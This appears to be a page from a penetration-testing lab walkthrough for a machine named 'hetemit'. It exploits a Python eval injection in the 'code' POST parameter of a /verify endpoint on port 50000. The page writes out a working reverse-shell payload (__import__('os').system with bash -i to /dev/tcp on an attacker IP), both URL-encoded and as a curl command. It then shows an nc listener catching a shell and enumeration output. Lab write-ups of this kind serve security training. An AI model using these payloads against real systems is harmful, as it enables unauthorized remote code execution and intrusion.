7 :50000_2

# we know that /verify is evaluating the POST param code=

# trying to understand which python func is being used in backend

# trying code=os
HTTP/1.0 200 OK
[truncated]

<module 'os' from '/usr/lib64/python3.6/os.py'>

# its eval

Using https://medium.com/swlh/hacking-python-applications-5d4cd541b3f1
| __import__('os').system('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1')#

# url-encode in burp
code=__import__('os').system('bash+-i+>%26+/dev/tcp/192.168.49.195/445+0>%261')%23

# can do it via curl as well
$ curl -X POST --data-urlencode 'code=__import__("os").system("bash -i >& /dev/tcp/192.168.49.195/445 0>&1")#' http://192.168.195.117:50000/verify 

$ nc -lvnp 445
listening on [any] 445 ...
connect to [192.168.49.195] from (UNKNOWN) [192.168.195.117] 60544
bash: cannot set terminal process group (1400): Inappropriate ioctl for device
bash: no job control in this shell
[cmeeks@hetemit restjson_hetemit]$ whoami;id;hostname;uname -a
whoami;id;hostname;uname -a
cmeeks
uid=1000(cmeeks) gid=1000(cmeeks) groups=1000(cmeeks)
hetemit
Linux hetemit 4.18.0-193.28.1.el8_2.x86_64 #1 SMP Thu Oct 22 00:20:22 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
Previous8 box enum cmeeksNext6 :50000_1

Last updated